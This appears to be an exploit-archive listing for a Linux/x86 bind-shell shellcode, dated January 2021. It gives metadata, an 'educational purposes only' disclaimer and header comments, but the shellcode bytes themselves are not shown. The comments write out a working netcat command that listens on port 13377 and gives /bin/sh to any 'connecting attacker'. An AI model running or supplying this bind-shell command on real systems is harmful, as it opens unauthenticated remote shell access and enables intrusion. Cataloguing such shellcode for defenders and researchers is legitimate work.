Exploits / Vulnerability Discovered : 2021-01-12 |
Type : shellcode |
Platform : linux
This exploit / vulnerability Linux/x86 bind (0.0.0.0:13377/tcp) shell (/bin/sh) shellcode (65 bytes) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Linux/x86 - bind shell on port 13377 Shellcode (65 bytes)
# Date: Jan 12, 2021
# Exploit Author: ac3
# Version: Linux x86
# Tested on: Linux x86
## linux x86 nc -lvve/bin/sh -p13377 shellcode
## This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker